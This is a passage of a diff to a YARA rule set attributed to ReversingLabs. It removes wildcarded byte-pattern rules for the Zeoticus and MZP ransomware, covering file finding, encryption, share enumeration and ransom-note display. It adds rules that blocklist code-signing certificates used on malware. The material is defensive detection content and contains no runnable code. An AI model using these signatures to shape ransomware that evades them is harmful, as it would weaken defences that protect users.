F6 84 24 ?? ?? ?? ?? ?? 74 - ?? 8D 44 24 ?? 50 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 74 ?? 83 BC 24 - ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B - D6 FF B4 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? - ?? FF B4 24 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 83 64 24 ?? ?? 55 FF 15 ?? ?? ?? ?? 5D 5F 5E 5B 81 - C4 ?? ?? ?? ?? C3 - } - $find_files_2 = { - 81 EC ?? ?? ?? ?? 8D 44 24 ?? 53 55 56 68 ?? ?? ?? ?? 50 8B D9 FF 15 ?? ?? ?? ?? 8B - F0 85 F6 0F 84 ?? ?? ?? ?? 8D 6C 24 ?? 8D 6C 75 ?? 33 C0 66 89 44 74 ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 59 E8 ?? ?? ?? ?? 83 C0 ?? 6A ?? 59 66 89 - 45 ?? E8 ?? ?? ?? ?? 83 C0 ?? 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 - FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 84 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 83 64 24 ?? ?? 8D 44 - 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 53 - FF 15 ?? ?? ?? ?? 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 - } - $find_files_3 = { - 81 EC ?? ?? ?? ?? 53 55 56 8B D9 57 8B FA 85 DB 74 ?? 33 D2 E8 ?? ?? ?? ?? 8B F0 85 - F6 0F 84 ?? ?? ?? ?? 57 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ?? - 0D ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 0D ?? ?? ?? ?? 50 57 FF - 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 0F - 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 80 7E ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 8C 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? FF 35 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0 - 0F 85 ?? ?? ?? ?? F7 44 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 56 - 57 FF 15 ?? ?? ?? ?? 50 8B D7 8B CB E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 85 C0 0F 84 ?? - ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? F6 44 - 24 ?? ?? 74 ?? 80 7E ?? ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 56 FF B4 24 ?? - ?? ?? ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 59 59 EB ?? 80 7E ?? ?? 74 ?? 85 DB 74 ?? 83 7C - 24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 80 3E ?? 74 ?? 6A ?? 8D 44 24 ?? - 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 44 24 ?? 50 FF 74 24 ?? FF 94 24 ?? ?? ?? ?? - 83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 - FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="68:e1:b2:c2:10:b1:9b:b1:f2:a2:41:76:70:9b:16:5b" and 1474502400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "5108fa8f-3fe6-518c-9bae-b1c44a0ec7a8" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13856-L13872" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f958e46e00bf4ab8ecf071502bcda63a84265029bc9c72cea1eaaf72e9003a84" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_*)) and ( all of ($encrypt_files_*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="5c:88:31:3b:d9:8b:de:99:c9:b9:ac:14:08:a6:32:49" and 1474243200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Zeoticus : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE { meta: - description = "Yara rule that detects Zeoticus ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "483b20a4-2c16-5509-a503-2462a53d4d31" - date = "2021-03-19" - modified = "2021-03-19" + id = "863a109c-034f-5168-9470-8fd4945e6e92" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Zeoticus.yara#L1-L90" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "adf42b96139ad98f4253f3eba2c4af1be9545825605e0851185cc15284d9e9a0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13874-L13890" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "038badeab61c00476b79684308bf91f8a63716641f2be16fe0a3b25ebd3a9a1e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Zeoticus" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $enum_shares_p1 = { - 53 55 8B 2D ?? ?? ?? ?? 8B C1 56 57 8B 3D ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51 - 8D 4C 24 ?? 51 6A ?? 8D 4C 24 ?? 51 6A ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 74 - ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 89 5C 24 ?? C7 44 24 - ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 39 73 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 - 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? FF 33 8D 44 24 - ?? FF 74 24 ?? 68 ?? ?? ?? ?? 50 FF D7 A1 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51 - } - $enum_shares_p2 = { - 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 56 FF 34 - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 56 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? - ?? ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 FF 85 C0 7E ?? 8D - 5F ?? 8D 44 24 ?? 50 FF 34 BD ?? ?? ?? ?? FF D5 85 C0 0F 44 F3 47 3B 3D ?? ?? ?? ?? - 7C ?? 8B 5C 24 ?? 85 F6 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? - ?? ?? 8B 3D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 50 FF D7 - A1 ?? ?? ?? ?? 83 C4 ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 6A ?? FF 34 85 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ?? - ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ?? 83 - C3 ?? 46 89 5C 24 ?? 89 74 24 ?? 3B 74 24 ?? 0F 82 ?? ?? ?? ?? 8B 5C 24 ?? 53 FF 15 - ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 - ?? ?? ?? ?? C3 - } - $encrypt_files = { - 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? - ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? - 83 C4 ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83 - C4 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D - 04 45 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? - FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 83 FB ?? 75 ?? E8 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? - 56 6A ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 E8 ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? - ?? 83 C4 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 - } - $find_files = { - 81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 01 - 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ?? ?? 56 8D 71 ?? 0F 85 ?? ?? ?? ?? - 55 8B 2D ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 66 90 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? - 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 74 - ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 - 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4C 74 ?? 85 C0 74 ?? 33 F6 90 - FF 34 B5 ?? ?? ?? ?? FF D7 83 F8 ?? 74 ?? 46 83 FE ?? 72 ?? 8D 44 24 ?? 50 FF 34 B5 - ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D - 4C 24 ?? 8D 51 ?? 66 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ?? - ?? 8D 71 ?? 0F 84 ?? ?? ?? ?? 5F 5D 53 FF 15 ?? ?? ?? ?? 5E 5B 81 C4 ?? ?? ?? ?? C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="7a:63:2a:6e:cf:c6:c4:9e:c1:f4:2f:76" and 1474959780<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "b31f73d5-ff9e-5be7-b806-8838ddb5d29d" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13892-L13910" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "09d5998960fb65eda56cd698c5ff50d87ba7a811cbb128bc7485c0f124e14cba" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ( all of ($enum_shares_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "smnetworks" and (pe.signatures[i].serial=="00:f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" or pe.signatures[i].serial=="f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7") and 1277769600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_MZP : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE { meta: - description = "Yara rule that detects MZP ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c08a4080-fa26-5b7b-869d-5f59096b1a12" - date = "2020-07-15" - modified = "2020-07-15" + id = "9a363a84-c21c-5afe-9812-9ce16962b28a" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.MZP.yara#L1-L147" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "724ae1033bfb8ff494b30e6b3333e6c848375f1b001b75e71c9444c9f9f31251" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13912-L13928" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d5e62d3cdfacfaea70f9ee11230501bb9c4099508077d50a2a143cb69476f02a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "MZP" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $show_ransom_note_p1 = { - 55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 53 56 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? - ?? 88 55 ?? 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C3 E8 ?? ?? ?? - ?? 89 1D ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 33 C0 - 89 46 ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? - ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? - 6A ?? 6A ?? 8D 45 ?? 50 33 C9 B2 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8D 86 ?? - ?? ?? ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? - C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ?? - ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? - ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? - ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 - ?? ?? ?? ?? B2 ?? 8B C6 E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? A1 ?? ?? - ?? ?? 8B 00 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 33 D2 8B C6 E8 - } - $show_ransom_note_p2 = { - C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? - ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? - ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? B2 - ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? C6 46 ?? ?? C6 46 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? C6 46 - ?? ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - F0 89 73 ?? BA ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 - 8D 46 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8B C6 C6 - 40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 - ?? 8B C6 C6 40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 89 43 ?? 8B 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 33 D2 E8 ?? ?? ?? - ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? 8D 46 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 43 ?? B2 ?? A1 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 89 43 ?? 8B 73 ?? 8D 46 ?? 33 D2 E8 ?? ?? ?? ?? 8D 46 ?? BA ?? ?? ?? - ?? E8 - } - $search_config_file = { - 8B C0 53 56 8B F0 8A 9E ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 75 ?? - 8B 46 ?? 8B 48 ?? A1 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 D2 8B - 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 83 BE ?? ?? ?? ?? ?? 74 ?? 8B 96 ?? ?? ?? ?? B8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? - EB ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 88 9E ?? ?? ?? ?? 8A 96 ?? ?? - ?? ?? 8B C6 E8 ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 74 ?? 8B 46 ?? 8B 8E ?? ?? ?? ?? 8B - 96 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8B 46 ?? E8 ?? ?? ?? ?? 8B 46 ?? 89 - 70 ?? 5E 5B C3 - } - $track_mouse_event_for_entropy = { - 53 56 83 C4 ?? 8B F0 8B 42 ?? 05 ?? ?? ?? ?? 83 E8 ?? 72 ?? 2D ?? ?? ?? ?? 0F 84 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 8A 86 ?? ?? ?? ?? 88 44 24 ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? - 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 8B D8 EB ?? 54 E8 ?? ?? ?? ?? 8D 4C 24 ?? - 8B D4 8B C6 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8D 54 24 ?? - 8B C6 E8 ?? ?? ?? ?? 8D 54 24 ?? 8B C4 E8 ?? ?? ?? ?? 8B D8 3A 5C 24 ?? 0F 84 ?? ?? - ?? ?? 8B C6 E8 ?? ?? ?? ?? 84 DB 74 ?? C6 86 ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? - 74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 8B 46 ?? 89 44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB - ?? C6 86 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 46 ?? 89 - 44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ?? - ?? ?? FF 96 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB ?? 80 BE ?? ?? ?? ?? ?? 74 ?? C6 86 - ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? - ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 5E 5B C3 - } - $find_files_p1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B FA - 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? - ?? B9 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? 8D 85 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 8A 08 41 E8 - ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ?? - ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 53 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? FF 43 - } - $find_files_p2 = { - 80 7B ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? EB ?? 80 7B ?? ?? 74 ?? 8D - 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D - 85 